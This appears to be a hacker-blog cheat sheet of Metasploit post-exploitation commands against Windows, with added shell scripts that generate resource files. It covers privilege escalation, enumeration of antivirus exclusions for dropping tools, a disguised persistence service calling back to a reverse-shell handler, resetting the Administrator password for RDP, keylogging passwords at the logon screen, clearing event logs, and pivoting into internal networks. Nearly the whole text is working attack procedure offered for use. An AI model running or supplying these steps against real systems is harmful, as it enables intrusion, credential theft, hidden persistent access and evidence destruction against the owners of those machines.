root💀bl4ck4non-sec:~#

Hack. Eat. Sleep. Repeat!!!


Using the getsystem command to try to escalate privileges to SYSTEM (it cycles through a few techniques such as named-pipe impersonation; it only succeeds from a session that already holds admin rights, otherwise fall back to the enumeration modules below to find a local exploit)

getsystem

To list the mounts or drives attached to the system

show_mount

To migrate a 32-bit meterpreter into a 64-bit process on a 64-bit target (some post modules misbehave from a non-native session)

search migrate
use post/windows/manage/archmigrate

To list the privileges held by the current user's token

use post/windows/gather/win_privs

To list the users currently logged on and their SIDs

use post/windows/gather/enum_logged_on_users

To check if the target machine is a virtual machine

use post/windows/gather/checkvm

Checking the installed programs on the target system

use post/windows/gather/enum_applications

To enumerate the antivirus on the target and the paths, extensions and processes it is configured not to scan (useful places to drop tooling)

use post/windows/gather/enum_av_excluded

To enumerate the computers part of the domain

use post/windows/gather/enum_computers

To list the patches installed on the target; whatever is missing from that list points at local privilege-escalation exploits that may still work

use post/windows/gather/enum_patches

To enumerate for shares

use post/windows/gather/enum_shares

To enable RDP on the target (covered in more detail below)

use post/windows/manage/enable_rdp
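An added example (not from the original page): a small POSIX shell helper that writes an msfconsole resource script running the gather modules above, one after another, against a single meterpreter session, with everything they print spooled to a file. It assumes the session id is supplied by the caller; the log path under /tmp is an arbitrary choice.

```shell
#!/bin/sh
# Added example, not part of the original page: batch the gather modules above
# into one msfconsole resource script for a given meterpreter session.
# Assumption: the session id is passed in by the caller; /tmp is an arbitrary
# location for the spooled output.

# Modules from the page, cheap checks first.
ENUM_MODULES="post/windows/gather/checkvm
post/windows/gather/win_privs
post/windows/gather/enum_logged_on_users
post/windows/gather/enum_applications
post/windows/gather/enum_av_excluded
post/windows/gather/enum_patches
post/windows/gather/enum_shares
post/windows/gather/enum_computers"

# gen_enum_rc SESSION_ID OUTFILE
# Writes the resource script to OUTFILE. Returns 1 without touching the file
# if SESSION_ID is not a plain integer (a typo here would otherwise make every
# module fail with an invalid session error).
gen_enum_rc() {
    sid="$1"; out="$2"
    case "$sid" in
        ''|*[!0-9]*) echo "gen_enum_rc: session id must be numeric, got '$sid'" >&2; return 1 ;;
    esac
    {
        # setg makes SESSION a global option, so every module picks it up
        # without a per-module "set SESSION".
        printf 'setg SESSION %s\n' "$sid"
        # Keep a copy of all module output for later review.
        printf 'spool /tmp/enum-session-%s.log\n' "$sid"
        echo "$ENUM_MODULES" | while IFS= read -r mod; do
            [ -n "$mod" ] || continue
            printf 'use %s\nrun\n' "$mod"
        done
        printf 'spool off\n'
    } > "$out"
}

# Usage: gen_enum_rc 1 /tmp/enum.rc
```

Source the result from the msfconsole that owns the session with `resource /tmp/enum.rc`; a fresh `msfconsole -r` would start with no sessions and every module would fail.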

Establishing persistence on Windows

Establishing persistence

search platform:windows persistence

Choose one, for example the service-based module, and fill in its options

use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set LHOST <your ip>
set LPORT <your port>
set SERVICE_NAME <a name that blends in with legitimate services>
set SESSION <id of your meterpreter session>
exploit

Once the sessions are gone (or the target reboots), the installed service calls back to LHOST:LPORT, so start a handler to catch it

use exploit/multi/handler

Set the same payload that was set for the persistence module

set payload windows/meterpreter/reverse_tcp

Set LHOST and LPORT to the values you used when setting up persistence, then run it

set LHOST <your ip>
set LPORT <your port>
exploit
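An added example (not from the original page): a POSIX shell helper that writes the two resource scripts for the persistence workflow above, one to install the service from the console that owns the session and one to run later in a fresh console to catch the callback. LHOST, LPORT, the session id and the service name are supplied by the caller; the default service name WinSvcHelper is a placeholder.

```shell
#!/bin/sh
# Added example, not part of the original page: write the two resource scripts
# for the persistence workflow above.
#   persistence.rc - sourced from the console that owns the session
#                    ("resource persistence.rc") to install the service
#   handler.rc     - started later in a fresh console (msfconsole -q -r
#                    handler.rc) to catch the service's callback after a reboot
# Assumptions: LHOST, LPORT, SESSION and the service name come from the caller;
# the default service name "WinSvcHelper" is a placeholder.

# valid_port N: true if N is an integer in 1..65535
valid_port() {
    case "$1" in ''|*[!0-9]*) return 1 ;; esac
    [ "$1" -ge 1 ] && [ "$1" -le 65535 ]
}

# gen_persistence_rc SESSION LHOST LPORT OUTFILE [SERVICE_NAME]
gen_persistence_rc() {
    sid="$1"; lhost="$2"; lport="$3"; out="$4"; svc="${5:-WinSvcHelper}"
    case "$sid" in ''|*[!0-9]*) echo "bad SESSION '$sid'" >&2; return 1 ;; esac
    valid_port "$lport" || { echo "bad LPORT '$lport'" >&2; return 1; }
    cat > "$out" <<EOF
use exploit/windows/local/persistence_service
set payload windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set SESSION $sid
set SERVICE_NAME $svc
exploit
EOF
}

# gen_handler_rc LHOST LPORT OUTFILE
# The handler must use the same payload, LHOST and LPORT the service was built
# with. ExitOnSession false plus "exploit -j -z" keeps it listening in the
# background, so every reboot of the target yields a fresh session without
# restarting the handler by hand.
gen_handler_rc() {
    lhost="$1"; lport="$2"; out="$3"
    valid_port "$lport" || { echo "bad LPORT '$lport'" >&2; return 1; }
    cat > "$out" <<EOF
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
exploit -j -z
EOF
}

# Usage:
#   gen_persistence_rc 1 10.8.0.2 4444 /tmp/persistence.rc
#   gen_handler_rc 10.8.0.2 4444 /tmp/handler.rc
```

The two files share LHOST and LPORT by construction, which is the detail most often got wrong when the handler is set up days later from memory.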

Enabling RDP

To enable RDP, background the meterpreter session and run the module against it

use post/windows/manage/enable_rdp
set SESSION <id>
run

Logging in over RDP needs a username and password. Since the meterpreter session runs as Administrator, you can reset the Administrator password from a command shell on the target (meterpreter's shell command). Be aware this locks the real admin out and is easy to notice; the module's USERNAME and PASSWORD options can instead create a separate account that is allowed to log in over RDP. To change the Administrator's password

net user administrator hacker_123321

Windows Keylogging

This uses meterpreter's keyscan commands once you have a session. The keylogger only sees keystrokes in the process the session lives in, so migrate first into the process whose input you want (explorer.exe for the logged-on user's desktop; winlogon.exe, from a SYSTEM session, to catch passwords typed at the logon screen)

To start

keyscan_start

To dump the captured key strokes

keyscan_dump

To stop the sniffer

keyscan_stop

Clearing windows event logs

To clear the Application, System and Security logs. Clearing is itself recorded (Security event ID 1102, System event ID 104) and is a common alert, so it hides earlier activity but signals that something happened

clearev

Pivoting

Here you have two hosts, victim_1 and victim_2. victim_1 can be reached and scanned from Metasploit directly; victim_2 cannot, which means it is only reachable from inside the network victim_1 sits on.

Get a meterpreter shell on victim_1

To reach victim_2, add a route for its subnet through the victim_1 session. victim_2 is on the same internal network as victim_1, so in the meterpreter session on victim_1 route that network

run autoroute -s 10.10.10.0/20

This adds the route; it lives inside Metasploit, so anything that runs as a Metasploit module can now reach that subnet. You can also give the session a name so it is easier to refer to

sessions -n victim-1 -i 1

Adding a route does not let external tools like nmap use it, since they know nothing about Metasploit's routing table. Use Metasploit's own TCP port scanner instead

use auxiliary/scanner/portscan/tcp
set RHOSTS <victim_2 ip>
run

Port forwarding from victim_2 through victim_1: in the meterpreter session on victim_1, forward a local port to a port on victim_2

portfwd add -l 1234 -p 80 -r <victim_2 ip>

-l --> local port to listen on (on your machine)
-p --> port on the remote host to forward to
-r --> remote host, i.e. the victim_2 IP

Now port 80 of victim_2 is reachable at port 1234 on your local host, so ordinary tools (a browser, curl, nmap against 127.0.0.1:1234) can talk to it through the pivot

To get a meterpreter shell on victim_2, use a bind payload. victim_2 has no route back to your machine, so a reverse_tcp payload would never connect; Metasploit reaches the bind listener through the route added above

set payload windows/meterpreter/bind_tcp
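An added example (not from the original page): a POSIX shell helper that writes a single resource script performing the whole pivot above from the msfconsole prompt: route the internal subnet through the victim_1 session, scan victim_2 through that route, set up the port forward, and stage an exploit against victim_2 with a bind payload. The session id, subnet, victim_2 address and local forward port come from the caller; the exploit module for victim_2 is left as a comment because the page does not name one, and the port list given to the scanner is an arbitrary selection.

```shell
#!/bin/sh
# Added example, not part of the original page: one resource script for the
# pivot above, to be sourced from the msfconsole that owns the victim_1 session.
# Assumptions: session id, subnet, victim_2 address and local forward port are
# supplied by the caller; the exploit for victim_2 is not named on the page, so
# it stays a commented placeholder; the scanned port list is arbitrary.

# valid_cidr A.B.C.D/N: loose syntactic check for the route argument.
valid_cidr() {
    printf '%s' "$1" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}/([0-9]|[12][0-9]|3[0-2])$'
}

# gen_pivot_rc SESSION SUBNET VICTIM2_IP LOCAL_PORT OUTFILE
gen_pivot_rc() {
    sid="$1"; subnet="$2"; v2="$3"; lport="$4"; out="$5"
    case "$sid" in ''|*[!0-9]*) echo "bad SESSION '$sid'" >&2; return 1 ;; esac
    valid_cidr "$subnet" || { echo "bad subnet '$subnet'" >&2; return 1; }
    cat > "$out" <<EOF
# Same effect as "run autoroute -s $subnet" inside the meterpreter session:
# traffic for $subnet from any Metasploit module now goes through session $sid.
route add $subnet $sid
route print

# Scan victim_2 with Metasploit's own scanner; external tools cannot use the route.
use auxiliary/scanner/portscan/tcp
set RHOSTS $v2
set PORTS 21,22,80,135,139,443,445,3389
run

# Expose victim_2's web port on our own host: localhost:$lport -> $v2:80.
# "sessions -C" runs a meterpreter command on the session given with -i.
sessions -C "portfwd add -l $lport -p 80 -r $v2" -i $sid

# Exploit victim_2 through the pivot (fill in the exploit for the service you
# found). A bind payload is required: victim_2 has no route back to us, so a
# reverse_tcp payload would never connect.
#   use <exploit module for victim_2>
#   set RHOSTS $v2
#   set payload windows/meterpreter/bind_tcp
#   exploit
EOF
}

# Usage: gen_pivot_rc 1 10.10.10.0/20 10.10.10.20 1234 /tmp/pivot.rc
#        then, in the msfconsole that owns session 1: resource /tmp/pivot.rc
```

`route add <subnet> <session>` at the msfconsole prompt and `run autoroute -s <subnet>` inside the meterpreter session produce the same routing entry; the script uses the former so that everything runs from one prompt.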